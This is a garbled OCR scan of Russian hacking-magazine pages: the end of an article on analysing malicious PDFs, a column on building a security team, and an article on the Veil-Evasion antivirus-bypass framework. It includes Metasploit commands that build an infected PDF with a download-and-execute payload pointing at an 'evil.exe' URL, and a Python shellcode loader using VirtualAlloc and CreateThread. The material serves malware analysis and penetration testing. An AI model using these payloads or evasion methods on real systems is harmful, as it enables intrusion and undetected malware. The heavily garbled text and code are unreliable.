ОаѵаЗсгірІжод, данный мод позволяет логи ров ать в файл вызовы функций еѵа!(), сіоситеп-р. 
іл/гіі:е(), которые чаще всего используются в обфусцированном коде для приведения его 
в первоначальный вид. Таким образом, перехватив вызов этих функций и сохранив воз- 
вращаемый результат в файл, мы получим деобфусцированную версию кода, из которой, 
как и в предыдущих случаях, необходимо будет извлечь шелл-код и провести его анализ. Ал- 
горитм действий таков: 

• сохраняем обфусцированный код в отдельный файл (например, затріе . ] з); 

• запускаем его в ЗрісІегМопкеу — ]з затріе.^з; 

• идем смотреть логи еѵаі* . 1о§, нгіѣе* . 1о§ в поисках деобфусцированного кода; 

• разбираем полученный код и выделяем из него шелл -код. 

Ну а дальше анализируем шелл-код и выясняем его функционал. 

РОР& 5 ШР 

До этого момента мы рассматривали только уязвимости, связанные с ошибками в движке 
иаѵаЗсгірі Однако существует еще один вектор распространения вредоносных программ. 
Дело в том, что РРР-файлы можно использовать просто как «контейнеры» для хранения и до- 
ставки пользователю зараженных ЗѴѴР-файлов. Да, эти два популярных продукта приносят 
много хлопот АбоЬе, которой периодически приходится выпускать зесигііу-обновления :). 
Чтобы проанализировать вредоносные РІазН-файлы, их надо предварительно вытащить 
из РОР-документа. Выполнить это можно при помощи утилиты 5ѴѴР МазіаЬ: 

зм- р та 5 6 а І і. ру -Т таіісіоиз.рсі-р -о ./ 

Опция -о отвечает за то, в какую директорию будут извлечены ЗѴѴР-файлы. Для решения 
этой задачи можно также воспользоваться и программой РОРЗігеат Оитрег. Как только ЗѴѴР- 
файлы окажутся в указанной папке, их можно будет изучить, например с помощью утилит 
ЗѴѴРПЕІооІз ( ЫМѵ/ІізірІ-Р ) и 5ѴѴР Іпѵѳзіідаіог ( ас)оЬе.Іѵ/ѵЕо4оѴѴ ). К сожалению, анализ ЗѴѴР- 
файлов нам придется оставить за рамками данной статьи. 

ПОДВОДЯ итоги 

Сегодня мы познакомились с тем, каким образом можно проводить анализ зараженных РОР- 
файлов, и рассмотрели основные методы защиты вредоносного кода от исследования. Из-за 
пристального внимания к безопасности продуктов АРоЬе можно найти в Сети много инстру- 
ментов, которые способны взять большую часть рутинной работы по анализу РОР’ок на себя. 
Так что ты всегда сможешь выбрать софт для решения той или иной задачи. Правда, от необ- 
ходимости шевелить извилинами это тебя никак не избавит. 

Что касается меня, то мой файл оказался простой пустышкой. В нем не было 
ни 0аѵа5сгір{, ни встроенных ЗѴѴР’ок — лишь только пара изображений и текст. Поэтому, 
немного разочарованный, я пошел дальше ждать своего халявного О-сіау-эксплойта. На- 
деюсь, скоро пришлют :). ІЗС 
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ИНСТРУМЕНТАРИИ 

Для исследования РйР-файлов пригодятся сле- 
дующие инструменты: 

* РОПк ( Ьіі,Іу/9ѴѴНМхА ) — кросс- 
платформенная программа для работы 

с РОР-файлами, позволяющая проводить 
декомпрессию их сжатого контента; 

* РОРЮ (Ь іМѵ/1 6 7407Н ) — сканирует файл 
на наличие определенных ключевых слов, 
позволяя сразу выяснить, используется ли 
в РОР-файле 4аѵаЗсгір{ или нет; 

* РРР-рагзег < ЫМѵ/15ѵУЫіУ Т и рсІТѵѵаІкег ( ЬИ.Іѵ/ 
іібАір) производят разбор файла, позволяя 
установить все элементы, из которых он 
состоит; 

* рсИехігасІ ( Ьі1:.Іѵ/Н5АЫ и рсІТ. ру ( ЫТІѴ/51Р61П 
извлекают ^аѵа5с^ір^ из РОР-файлов; 

* МаІгіІІа ( ѵѵ\л/\л/.таІ 2 іІІа.ога ) и ЗрібегМопкеу (Ьіі 
Іу. {Кд N50 ) пригодятся для деобфускации 
внедренного в РйР 4аѵа5сгір1:-кода; 

* РйР Зігеат Оитрег ( Ьіі К 9баШ 9) — много- 
функциональная утилита для исследования 
РОР-файлов, собравшая всю мощь многих 
утил ит под одним графическим интерфейсом; 

* РеерсК ( Ьі11у/іУА5в4 ) и рсІІвН ( Ыі.Іу/пХЦаАѵ ) 
предоставляют интерактивный шелл для ис- 
следования РОР-файлов; 

* 5ѴѴР таэіай ( зіІ.Іѵ/гѵѵдѴѴМ ) извлекает 5ѴѴР- 
объекты из РОР-файлов. 



ПОДОПЫТНЫЕ 
ДЛЯ АНАЛИЗА 

Чтобы не сидеть и не ждать, пока тебе придет 
письмо с РОР-файлом, который можно было бы 
проанализировать, лучше обратиться к архивам 
вредоносных аттачей (ріі Іу 1 бХсеАи), ис- 
пользовавшихся для фишинга и целевых атак. 
Архивы скачиваются без проблем, правда, для их 
распаковки надо будет связаться с владельцем 
ресурса, чтобы получить пароль. 

Если не хочется ничего скачивать, то можно 
воспользоваться услугами Меіазріоі! Ргатеѵѵогк. 
Запускаем теіеопзоіе и выполняем следующие 
действия: 

ІТ15-Р > Ы 5 Ѳ ехрІ0ГЕ/ЫІПСІ0Ц5/ЬГ0Ц5ег/«-‘ 
асІоЬе_тесІіа_пеыр1ауег 
тз^ ехр1оіб(агіоЬе_тес!іа_пеілф1ауег) > 
зеі РАУ ЮАР ыіпеІоы5/ сіоілі п1оас1_ехѳс 
тз-р ехр1оіб(агіоЬе_тесІіа_пеілгр1ауеп) > 
зеб ІІКБ ІгЫр: //ыны. хакер. ги/еѵіі.ехе 
тз-р ехрІоіК ас!оЬе_тесІіа_леыр1ауеп) > 
ехріоіі: 

После чего на порту 8080 поднимается НТТР- 
сервер, который при подключении к нему воз- 
вращает пользователю зараженный выбранным 
пейлоадом РРР-файл. 

[ *1 Цбіп^ 1181: Ні-Ьр : //Ѳ.Ѳ.0. 0:8 08 8/^ 

САІѵіЫІр 

Г*1 Ьосаі ІР: МПр: //192.168.20.11:^ 

8Ѳ8Ѳ/САІѴІИІР 

X*] 5епѵег зіап-ресі. 

Таким образом, при помощи ѵѵдеі’а (ы^еб 
Ыір : //192 . 168 .20.11: 8080/СА1 р -О еѵіі. 

рсІТ) или браузера можно заполучить этот файл 
для дальнейшего анализа. 



Анализ ЗаѵаЗсгірі-кода с помощью РОР Зігеат Оитрег. Переменная 2Н2Ша содержит шелл-код 
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АЛЕКСЕИ СИНЦОВ 

Известный ѵѵМіе Ііаі, докладчик на зесигііу- 
конференциях, ооорганизатор ^егоИідІіІз 
и просто отличный парень. В данный момент 
занимает должность РгіпсіраІ Зесигііу 
Епдіпеег в компании Мокіа, где отвечает 
за безопасность сервисов платформы НЕВЕ. 



КОЛОНКА 

АЛЕКСЕЯ СИНЦОВА 





РОЛЬ КОМАНДЫ 
ПРИ ПОСТРОЕНИИ 
ЗАЩИЩЕННОЙ СИСТЕМЫ 

Если ты заметил, то мы тут постоянно говорим о том, как пи- 
сать безопасный код и защищать платформу. Все это по- 
лезно и важно, но безопасность — это не какой-то чеклист 
из действий и правил, это целый процесс. И самое главное 
тут — люди, которые этот процесс поддерживают. Это про- 
фессионалы своего дела, а не жадные интеграторы или хитрые 
консультанты со стороны. 



ЦЕЛИ 

В каждом проекте под безопасностью понимаются совершен- 
но разные вещи. Для кого-то ИБ — это бумажки и бесконечные 
терки с регуляторами. Другим требуется обеспечить внутрен- 
нюю безопасность, защититься от недобросовестности своих 
же сотрудников. А кого-то беспокоит именно защита внешне- 
го периметра, угроза взлома. Для каждого отдельного слу- 
чая нужно сформулировать свой набор задач и необходимых 
спецов. Возьмем защиту внешнего периметра, которой я за- 
нимаюсь в данный момент. 

Какие проблемы есть при защите внешнего периметра? 
Самое очевидное — дыры, через которые можно получить до- 
ступ куда не следует. Но само понятие «дыра» очень абстрак- 
тно. Дыры бывают разные — в платформе, в приложениях, 
в инфраструктуре ЦОДа или облака. Во всех этих сценариях 
возникают особые задачи. А есть еще и проблемы ргіѵасу, важ- 
но, где и как мы храним данные, за которые отвечаем. Тут мы 
должны учитывать и локальное законодательство, и требова- 
ния регуляторов (скажем, Ѵіза/МазІегСагсІ). 

Такая куча задач приводит к тому, что нужны процессы, ко- 
торые будут отвечать заданным целям. Попробуем разобрать 
некоторые из них. 

ПРОЦЕССЫ 

Итак, во внешнем периметре мы имеем некую платформу, 
некий софт и некие данные. Защищаемым активом здесь яв- 



ляются именно данные пользователей, которые мы обраба- 
тываем, и то, что мы «ограниченно предоставляем» особым 
клиентам. 

Допустим, мы используем АѴѴЗ как площадку. Надо поза- 
ботиться о шифровании данных и их хранении у третьих лиц, 
к тому же мы должны четко информировать пользователя 
о том, какая информация нами собирается и что мы с ней де- 
лаем или не делаем. Все это уже отдельная проблема и работа. 

Кроме того, у нас есть сервисы, по сути — приложения, ко- 
торые мы разрабатываем и предоставляем, в них могут быть 
дыры как в коде, так и в логике; плюс есть платформа, кото- 
рую также нужно поддерживать в «защищенном» состоянии, 
Для простоты разделим все на процессы и подпроцессы: 

1. Поддержка ргіѵасу: 

* местное законодательство. Информация и то, как мы 
с ней работаем, не должна нарушать законов; 

* требования регуляторов. Условия обработки инфор- 
мации могут быть продиктованы не только законами, 
но и требованиями сторонних сервисов, которые мы 
используем; 

* специфика бизнеса. В компании могут быть свои пра- 
вила и свое видение работы с той или иной информаци- 
ей. Например, если мы производим нечто и предостав- 
ляем это пользователям (например, платный контент), 
то это нечто также надо защищать и это тоже становит- 
ся защищаемым активом. 
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Колонка Алексея Синцова 
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2. Анализ рисков: 

• классификация информации; 

• анализ возможных проблем. Потенциальный ущерб 
и прочие «бумажные» темы, которые становятся акту- 
альными в самый неподходящий момент; 

• оценка ресурсов и целесообразности тех или иных про- 
ектов по ИБ или иных решений. 

3. Построение архитектуры защиты: 

• оценка аПаск зигіасе; 

• принятие решений по технической реализации. Алго- 
ритмы, технологии, логика защиты должны учитывать 
возможные векторы атаки, риски и многие вещи. Это 
тот самый момент стыка «бумажников» и технарей :); 

• выработка стандартов для проектов, например 
НМрОпІу, 551 требования к ключам, формат лог-файлов 
их хранения и так далее. 

4. Безопасная разработка кода: 

• автоматизация. Средства сканирования кода, напри- 
мер статические анализаторы, которые встраиваются 
в цикл производства; 

• обучение персонала. Выработка единого стиля про- 
граммирования; 

• аудит кода. Для критичных кусков кода при определен- 
ных условиях (неминорный патч, новая версия...) необ- 
ходимо проводить в том числе и ручную проверку кода. 

5. Реагирование на инциденты: 

• поддержка систем Ю5; 

• Ьид ЬоипГу; 

• работа с СЕВТ; 

• расследование инцидентов; 

• работа в режиме йоіТіх с В&Э. 

6. Поддержка ИБ: 

• раісб тападтепі; 

• ѵиІпѳгаЬШІу тападтепі:; 

• организация локальных ивентов (например, обучать раз- 
работчиков принципам безопасной разработки кода). 

Все это — сложные и многогранные процессы, техниче- 
ская и бумажная работа, которой должны заниматься пра- 
вильные люди, 

ЛЮДИ 

Итак, кто нужен для нашего проекта? Какая она, идеальная 
команда? 

Директор 

Куда без босса? Кто будет представлять ИБ в среде топ- 
менеджмента, кто будет лицом там, наверху? Неважно, как его 
называть — 0150 или директором по ИБ. Важно, чтобы этот 
человек представлял цели бизнеса, цели ИБ и делал все это 
эффективным. Он разбирается в проблемах бизнеса, он пони- 
мает риски и принимает сложные решения. Непосредственно 
директор ответственен за все, что делает его команда, и имен- 
но его волю и видение реализуют все остальные. В то же время 
его решения и действия являются частью работы его команды, 
которые более тонко могут разбираться в технических вопро- 
сах ИТ и ИБ и некоторых последствиях от того или иного шага. 

Менеджер 

Когда бумаг много, процессов тоже становится много и нужен 
кто-то, кто будет решать задачи на уровне менеджмента все- 
го этого: что в первую очередь, что во вторую, что у нас еще 
не сделано, а что делается медленно, как переложить ресурсы 
и где их слишком много. Это абстрактно, конечно, и зависит 
от конкретной команды, но менеджер — этот тот, кто помога- 
ет все держать связанным по времени, срокам и прочим бу- 
мажным вопросам. Их может быть несколько в зависимости 
от размеров работы. Сюда, в принципе, можно внести любого 
«бумажника», который решает определенные задачи на уров- 
не «надо, чтобы было так», но и который бы понимал, как это 
сделать на верхнем уровне (задачи 1, 2, 6 — построение про- 
цессов, и их планирование весьма тяжелый труд). 

Технический персонал 

Архитекторы, инженеры ИБ идут последними в списке, 
но именно это самый ценный ресурс. В нормальной коман- 



Идеальная команда — это команда , 
в которой менеджеры помогают 
техперсоналу — инженерам, 
архитекторам и прочим хакерам 
своего отдела координировать 
их работу 



де все держится на их экспертизе, навыках и заключениях. 
Ни один менеджер или директор не скажет «давайте вне- 
дрять то или это» или «риск тут именно такой» без того, чтобы 
инженер не ПОДТВЕРДИЛ истинность вышесказанного. По- 
тому что менеджеры мало знают о реальных рисках, атаках, 
уязвимостях... они берут то, что им говорят инженеры и кон- 
сультанты (если своих инженеров нет). Именно инженеры ИБ 
смогут точно оценить тонкие риски, связанные с ІТ, выявить 
уязвимости как в логике, так и в коде, проводить работы 
по анализу логов систем ИДС, и вообще это ниндзя (задачи 
1 , 2, 3, 4, 5, 6 — да эти люди вовлечены во все процессы, если 
подумать). 

В итоге идеальная команда — та, где менеджеры помога- 
ют техперсоналу — инженерам, архитекторам и прочим хаке- 
рам своего отдела — координировать их работу и процессы, 
ну и ресурсы, а те, в свою очередь, помогают менеджеру быть 
в теме и достигать цели. Директор же контролирует эффек- 
тивность и счастье бизнеса в целом и команды ИБ в частно- 
сти, как свое дитя. Тогда эффективность будет расти, а цели 
достигаться, причем реальные цели, а не отписки. Конечно, 
проблемы будут всегда и везде, главным образом — далеко 
не все могут позволить себе иметь такую команду, и даже да- 
леко не всегда она целесообразна. Но все же иметь технаря 
ИБ в довесок к грамотному менеджеру ИБ сильно повысит 
адекватность вашей СУИБ, причем в разы. Можно очень тон- 
ко комбинировать аутсорс-услуги с применением собствен- 
ных сил, в зависимости от задач и поставленных процессов, 
но нельзя полностью уходить на растерзание консультантов 
и интеграторов. Это чревато потерей контроля над ситуацией 
и зависимостью от сторонней компании в важных процессах. 

ЗАЧЕМ? 

Что же я хотел сказать всем этим? Не скидывайте задачи ИБ 
в довесок к разработчикам и системным инженерам, если это 
не часть процесса (например, самоконтроля и правил разра- 
ботки кода). Но не надо доверять всю техническую часть кон- 
сультантам со стороны и интеграторам. Если есть менеджер, 
но ему нечего менеджить, кроме как проекты с интегратора- 
ми и аутсорсерами, — это грустно. 

Интеграторы и прочие сторонние консультанты заинтере- 
сованы в продаже своих услуг. Это не значит, что они не нуж- 
ны в принципе, — просто надо знать возможности и цену 
любой работе. Например, проще нанять одного инженера, 
чтобы он внедрил Ю5 и настроил правила именно под твою 
систему, чем нанимать интегратора, который внедрит систе- 
му из коробки, а та будет реагировать на кучу Іаізе розіііѵе, 
и придется покупать у них еще и мониторинг ивентов как аут- 
сорс. 

К тому же часто интеграторы хотят внедрить «несколько» 
больше дорогих штучек, чем нужно тебе, но так как у тебя нет 
понимания того, что именно нужно (нет инженеров, архитек- 
торов), то придется верить своему интегратору. Я знаю слу- 
чаи, когда крупный банк после найма интегратора нанимал 
стороннего консультанта, чтобы тот оценил адекватность ин- 
тегратора, и как бы стравливал их. Что ж, главное — платите 
деньги, а там любые извращения доступны! 

Так что посыл мой таков: ИБ — это люди, которые ответ- 
ственны, профессиональны и инициативны на всех уровнях, 
будь то бумажная ИБ или ІТ 5есигі1у, и комбинация таких лю- 
дей в вашей команде — залог успеха и счастья :). Ш-Е 
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Вуаль для пейлоадов 




Многим пентес ерам знакома про- 
блема, когда при проведении аудита 
безопасности пейлоады перехваты- 
ваются антивирусным программами. 
И хотя практически всегда можно 
обойти антивирусную защиту клиен- 
та, на создание и развертку нужных 
для этого решений уходит слишком 
много времени. При этом авторам 
вредоносных программ не составля- 
ет большого труда обойти защитные 
механизмы. Нам хотелось иметь та- 
кую же возможность при проведении 
своих пентестов, чтобы можно было 
продемонстрировать нашим клиен- 
там более реалистичные сценарии 
проникновения. Так и зародился про- 
ект ѴеіІ-Еѵазіоп. 
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ПРЕДПОСЫЛКИ 

Старая истина «Время — деньги» применима и к области пен- 
тестирования, поэтому часы, потраченные на попытки обойти 
антивирусную защиту вручную, никак нельзя назвать прове- 
денными с пользой. Из-за того, что антивирусы все чаще пере- 
хватывали наши пейлоады при аудите, мы теряли все больше 
времени. А ведь куда полезнее было бы вместо того, чтобы 
бороться с антивирусными решениями, непосредственно про- 
верять уязвимости, 

В Сети описывается несколько популярных методов об- 
хода антивирусов. В качестве примеров можно привести со- 
крытие вредоносного кода в упакованных исполняемых фай- 
лах на Руійоп, которое продемонстрировал Дэвид Кеннеди 
(@ТгизІесі5ес), возможность МісгозоІТ ѴѴіпсіоѵѵз РоѵѵегЗІпеІ!, по- 
зволяющую скрывать природу и само присутствие бинарного 
файла, выявленную командой РоѵѵегЗрІоф и написанные на С# 



Рис. 1 . Списокдоступ- 
ных пейлоадов 



Рис. 2. Меню пейло 
ада Ру41юп/Вазе64 
Епсосіесі 
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сервисы ( ЬіМу/08оѵ2А ) Рича Ландина, которые показали себя 
крайне эффективными в сценариях обхода антивирусов. 

Однако же, несмотря на обилие доступной информации, 
мы не нашли ни одного решения с открытым исходным кодом, 
которое бы позволяло генерировать пейлоады, способные об- 
ходить антивирусы. Поэтому мы рассудили, что нам по силам 
восполнить этот пробел. 

0Б30РФРЕЙМВ0РКА 

Решение проблемы с антивирусами началось со скромной 
версии ѴеіІ 1.0, состоявшей из одного-единственного РуІМоп- 
файла, который генерировал различные пейлоады и упако- 
вывал их в исполняемые файлы с помощью ру2ехе. Участие 
Кристофера Трансера, одного из разработчиков ѴеіІ-Еѵазіоп, 
в зеси г ііу- подкасте Раиісіоісопл вызвало огромный ажиотаж во- 
круг нашего проекта, и вскоре члены сообщества пентестеров 
начали использовать ѴеіІ-Еѵазіоп и делиться с нами ценными 
замечаниями. Затем к команде разработчиков присоедини- 
лись Майкл Райт и ТііеОгауЬоипсІ и полностью переработали 
код проекта, чтобы сделать из него модульный расширяемый 
фреймворк без привязки к конкретным языкам и технологиям. 

К настоящему времени ѴеіІ-Еѵазіоп эволюционировал из уз- 
коспециализированного инструмента в фреймворк ѴеіІ — ак- 
тивный и расширяющийся проект, лишь отдаленно напоминаю- 
щий свою первоначальную версию. С релиза 2.0 наша команда 
начала движение в сторону полностью модульного фреймвор- 
ка. Кроме этого, вторая версия отличалась от предшественника 
новой структурой и массой добавленных возможностей: 

* меню и интерфейс ѴеіІ были спроектированы с учетом прин- 
ципов юзабилити, чтобы корректно обрабатывать как можно 
больше ошибочных сценариев; 

* дерево пейлоадов Меіазріоіі для ѴѴіпсіоѵѵз обходится с из- 
влечением всех пейлоадов и их обязательных параметров. 
Это значит, что все генерируемые МзІѴепот нагрузки 
с шелл-кодом ѴѴіпсіоѵѵз могут быть интегрированы в ѴеіІ. 
Для пейлоадов в меню выбора шелл- кода работает авто- 
дополнение по ТаЬ в МзІѴепот-формате иіпсІоиз/РАУІОАО; 

* автодополнение по ТаЬ было добавлено и в другие части 
фреймворка, включая большинство меню; также добавлена 
автоподстановка локального Р-адреса в і_Н05Т и подстанов- 
ка 4444 в 1.РОРТ; 

* почти для всех опций были реализованы ключи командной 
строки, которые можно просмотреть с помощью команды 
./Ѵеіі.ру -И. 
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Что касается структуры Ѵеіі, то она стала выглядеть следу- 
ющим образом: 

• пейлоад- модули, помещаемые в ./шосІи1е5/рау1оасІ5/ 
[1ап§иа§е], автоматически загружаются в фреймворк; 

• функции общего назначения хранятся в ./пюсіиіез/ 
соттоп/*; 

• исходники и скомпилированные файлы сохраняются 
в . /оиіриі/зоипсе/ и . /оиіриі/сотрііесі/ соответственно; 

• используемые пейлоадами внешние инструменты хранятся 
в . /ііооіб/; 

• папка ./сіос/* содержит документацию для фреймворка, 
сгенерированную утилитой рубос. 



Рис. 3. Готовый шаблон 
для создания своего 
пейл оада іетріаіе. ру 



Рис. 4. Интеграции 
сторонних инструмен- 
тов в Ѵеіі -фреймворк 
на примере Нурегіоп 



ИСПОЛЬЗОВАНИЕ 

Чтобы запустить Ѵеіі, необходимо воспользоваться командой 
./Ѵеіі.ру. При первоначальном запуске Ѵеіі выполнит код 
из ,/соітІі§/ирсІа1:е.ру ( который попытается определить уста- 
новочные директории фреймворка, получить подробные све- 
дения об ОС и другие важные параметры, а затем сохранить 
их в конфигурационный файл ./сопІп§/ѵеі1.ру, который также 
можно в случае необходимости отредактировать и вручную. 

После этого попадаем в основное меню. В нем отображает- 
ся количество загруженных модулей и список полезных команд. 

Достаточно набрать Іізі, чтобы вывести список всех пейлоа- 
дов, 1і5і: 1ап§5 — чтобы вывести список доступных языков 

пейлоадов, либо 1і5і: [язык] , чтобы вывести список всех пей- 
лоадов для конкретного языка. Также можно набрать 1і5і и на- 
жать ТаЬ для автодопол нения из списка доступных языков. 

Чтобы получить информацию по определенному пейлоаду, 
надо выполнить іпТо [номер либо имя пейлоада]. После за- 
грузки выбранного модуля попадаем в меню пейлоада. 

В нем представлены детальные сведения и обязательные 
опции для выбранной полезной нагрузки, а также доступные Рис. 5. Исходный код 
команды. В подразделе гедиігеб орііопз (обязательные опции) пейлоада 



ітрогі сХурез 

ОХР] гКЬОзрКОІІ-и = ЬуХеаггау( 1 \хсіа\хс4\хсі9\х74\х24\хХ4\хЬХ\хсІ6\хсіс\х1Х\хсІ7\х5В\х31\хс9\хЫ\х44\х' 
1\х78\х19\х83\хс0ѴхѲ4\хѲЗ\х78\х15\х34\х29\хс6\хЗс\х23\хѲЬ\х8сі\хѳ6\ха7\х9сІ\хЬс\х5Б\хЗѲ\хеХ\х89\х' 
ѳ\х35\хУѳ\хЗа\х74\хЗАх8сі\хЫ\хТс\хаЗ\хѲ6\х83\х08\х5Ѳ\х66\х2с\х82\х5Ѳ\ха1"\х63\х8с\хе9\хЗе\х22\хс 
сІ\хсѲ\хЗс\х34\хссіѴхб9\хае\х93\х2а\хеб\хба\хеѲ\хЬ9\хас\хБс\х60\хЬі : \хаб\х1б\хсіа\ха7\хЬсі\х73\х1 = Ь\хс 
6\х2а\хбѲ\хс Ах91\х27\х53\хЬЬ\х23\хс!9\хасЛх44\х12\хе5\х32\х16\хШ\х25\хЬе\х60\х1Ь\хба\х32\х6е\хЕ 
с\х91\хЬ9\х4Ь\х1е\х7Ь\х6а\хсІ9\х31 = \х08\х30\х05\хс 1\хе5\хаЗ\хсе\хссІ\хЬ2\хаѲ\х8Ь\хгі1\х45\х5с\ха0\х* 
е\хсе\хаЗ\х5^\х67\х94\х87\х83\х19\хсІ7\х7а\хЬЗ\х'Г0\х03\х’РЗ\х21\х8Ь\хб9\х6с\х24\хс2\хбЗ\х81\х6а\х; 
3\хѳ4\хаб\х74\хЗс\х93\х1с\х8^\х78\хсІсІ\х46\хбсІ\х0сІ\хаб\х6Ь\х56\хаѲ\х40\хІ€І\х69\хЬЬ\хбТ\хаЬ\хсіЗ\х^ 
с\хе7\хс0\хЬ7\х6с\хЬ6\х70\х7Ь\х5^\х16\хе5\х13\хѳа\х15\х8Ѳ\х91\х9с\х85\х6е\х5с\х14\х(13\х39\х9Т\х" 
3\х1 Ах4Лх9сІ\х2с\ха4\хе7\х8Ѳ\х8Ѳ\х66\х7Ѳ\хсІ8\хЗе\хс4\х97\х86\хс1\х17\х98\х2Ь\х51\х9ЛхЗТ\х8с\х( 
5\хЗѳ\ха7\ха9\х57\ха8\хба\х57\х2Ь\х5Ь\х44\х4с\х43\хс7\х82\х78\хсІсІ\х14\ха2\х24\х'Гс1\х^а\х13\хЬсІ\хІ 
0\ха9\х15\х1с\х23\х31\х'р5\х33\х93\хс17\х66\хѳ0\х1 : 3\х41 \х11\хЬ0\х96\хѳ1\х8сі\х71\х9Ѳ\х71\х01\х56\х- 
2\х08\х7Ь\ха7\хе0\хБ8\х2і : \х99\х56\хаЗ\х1 Т\х28\х97\х0Ь\х5Т\х1е\х1 Т 1 ) 

ОРРБІтІсКЕирреН = с 1; урез .^іпсііі . кегпѳ132 . ѴігІиаІАНос ( с 1: урез . с_іп1 [ Ѳ) .сііурен .с іпі (1ѳп( 01 Р] гКІ_0^ 
рКОіНО) ) ^Ігурез .с_іп1 (0x3000) ,с1урез .с_іп’1(Ѳх40П 

ѵѵ г Ѵ] х7Во2уКРсСиР = ( сіурез .с_сИаг * 1еп(01Р]7КЮзяК01НО) ) .1 : гот_Ьи11ег(01Р^7К^^5^К0іН^) 

сіурез ,ы1псЛ1 *кегпе132 .РИНоѵеМетогу { с 1 урез ,с_т1: ( ОРВВІітіІсКЕирреН) , ѵѵѴ і х2Во7уКРс0иР г с1урѳз .с_іп1: і 

іѳп ( ріРд гКЦОзчКріШ ) ) ) 

щѴОкрРхУѵ/ІпипіІРС = с 1; урез .ѵ/іпсІ11 Легпе132 .Сгеа1еТНгеасІ( с 1 урез .с_іп1 (0) , сіурѳз ,с_хп1: (0) , с1урез,с_: 

пі (ОРР^БІтІсКЕирреН) ,с!урез .с_іп! (0) , с! урез . с_іпі: (0) , сіурѳз .роіпіег( с 1 урез „ с іпі: (0) ) ) 

сП урез .'уѵ'іпсііі , кегпеі 32 .‘іл/аіПРогЗіпдІѳОЬ] есі ( сП урез .с іпП ( тѴЗкрОхУи/РіипіПРС) , сПурез .с іпі ( -1) ) 



для каждой опции отображается ее имя, описание и значение 
по умолчанию — если оно отсутствует, то для генерации пейло- 
ада придется самостоятельно ввести значение опции. Для это- 
го достаточно набрать геі: [имя опции] и указать нужное зна- 
чение. 

После ввода обязательных опций для генерации пейлоа- 
да необходимо выполнить команду §епегаіе. Если в пейло- 
аде используется шелл-код, то попадаем в меню шелл-кода, 
где можно выбрать МзІѴепот или произвольный шелл-код. 
При выборе произвольного шелл-кода его необходимо будет 
ввести в виде \х01\хѲ2... без кавычек и переводов строки 
(\п). Если выбран МзА/епот, то по умолчанию будет предложен 
ілііпсіомБ/теііегргеіеп/геѵегзе^ср. Если нужен другой шелл- 
код, то надо будет ввести имя любого ѴѴіпсіоѵѵз шелл- кода, 
используя синтаксис МзіѴепот (міпсіошз/. . . ), либо выбрать 
его из списка с помощью ТаЬ. После выбора шелл-кода будет 
предложено указать обязательные опции (пользуясь автоза- 
полнением по ТаЬ, можно подставить в опцию Ш05Т локальный 
ІР, а в і_Р(ЖТ — 4444, номер порта, используемый по умолчанию 
в М5Р). После ввода обязательных опций можно ввести значе- 
ния дополнительных опций МзА/епопл в формате ОРТІОІЧ^ѵаІие. 

По нажатию Епіег будет сгенерирован шелл-код и собран 
пейлоад, После этого попадаем в меню вывода, где можно вы- 
брать базовое имя для генерируемых файлов. Если пейлоад 
использует РуіЬоп и была установлена опция сотрііе іо ехе, 
пользователю предоставляется выбор между руіпзіаііег (ком- 
пиляцией в ЕХЕ-файл на Каіі Ыпих) и генерацией исполняемых 
файлов с помощью ру2ехе. Последний экран отображает ин- 
формацию о сгенерированном пейлоаде, включающую место- 
положение файлов с исходным и скомпилированным кодом. 
Нажатие любой клавиши вернет главное меню. 

РАЗРАБОТКА ПЕЙЛОАДОВ 

В проекте Ѵеіі-Еѵазіоп большое внимание уделяется разработ- 
ке расширяемого фреймворка, в который пользователи могут 
быстро и с легкостью интегрировать свои собственные мето- 
ды уклонения от антивирусов, пользуясь при этом всеми воз- 
можностями фреймворка для ускорения разработки. Для того 
чтобы создать свой пейлоад, можно воспользоваться готовым 
шаблоном — . /тосіиіез/рауіоасіз/іетріаііе. ру (рис. 3). 

Чтобы было понятней, что собой представляет пейлоад 
и как его создавать, кратко рассмотрим основные моменты. 
В начале каждого модуля находится строка-комментарий, 
в которой описывается механизм работы модуля, содержатся 
ссылки на используемые модули и имя автора. Далее следуют 
команды импортирования общих модулей Ѵеіі, содержащихся 
в . /тосіиіез/соттоп/*, в виде ігот тосіиіез . соттоп ітрогі 
МСЮ1Л_Е. Ниже перечислены некоторые базовые модули и ме- 
тоды, которые могут пригодиться при разработке собственных 
пейлоадов: 

• соттоп . пап сіотіхе г — различные методы рандомизации 

строк/переменных; 
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* соттоп.епсгурііоп — методы шифрования (АЕ5- 
шифрование, подстановочные шифры и так далее); 

* соттоп . сгур^егз — средства для шифрования и обфуска- 
ции отдельных языков (пока что доступен только Руііегіоп); 

* соттоп . зііеіісосіе — наиболее часто используемый модуль, 
предназначенный для генерации шелл-кода; 

* сопЯ§.ѵеі1 — значения настроек; получаются в виде ѵеіі. 
С0І\ІРІС_5ЕТТІІ%. Импортируется командой -Егот сопЕі§ 
ітрогі: ѵеіі. 

В методе іпіі ( ) обязательно нужно инициализировать 

следующие опции: 

* зеІ-Р . зИогіпате — сокращенное имя, используемое для об- 
ращения к пейлоаду; 

* зеІ-Е.сіезсгірІііоп — более подробное описание пейлоада, 
максимальная длина равна 12 предложениям; 

* зеІ-Е Лап§иа§е — язык, на котором написан пейлоад (на 
данный момент можно выбрать из руІИоп/сз/ро\л/егзІіеІІ/с#/ 
паііѵе); 

* 5е1-р. гаі;іп§ — оценка того, насколько хорошо метод обхо- 
дит антивирусы (на данный момент устанавливается самим 
автором); 

* зеІ-Е.ехіепзіоп — расширение, с которым сохраняется 
файл пейлоада. 

При необходимости можно использовать и другие опции: 

* зеІ-Е. зііеіісосіе = зііеіісосіе. $Ие11сосІе() — инициализи- 
руется, если требуется генерировать шелл-код; 

* зеІ-Р. по*е5 — дополнительные примечания (например, ин- 
струкции по ручной компиляции), которые показываются 
пользователю при генерации; 

* зеі-р. гедиігесІ_орііоп5 — опции пейлоада, для которых 
обязательно указывать значение. Записываются в формате 
{имя_опции : [”значение_по_умолчанию" , "описание"]}. 
Если значение по умолчанию не указано, Ѵеіі автоматически 
запросит у пользователя значение опции перед генерацией 
пейлоада. 

Метод §епега1:е( ) — это то место, где и творится все «вол- 
шебство». Шелл-код может быть создан внутренними метода- 
ми Ѵеіі путем обращения к внутреннему объекту зііеіісосіе че- 
рез вызов зеІ-Е. зІіеІІсосІе.еепегаіеО. При этом генерируется 
шелл-код по указанной пользователем спецификации. В стро- 
ках 36 и 37 (см. рис. 3) демонстрируется использование крипто- 
ра для шифрования исходного кода. В результате возвращает- 
ся исходный код, который может быть использован в Ѵеіі. 

Создав свой собственный модуль для генерации пейлоадов, 
можно сохранить его в любом месте внутри папки ./тосІи1е5/ 
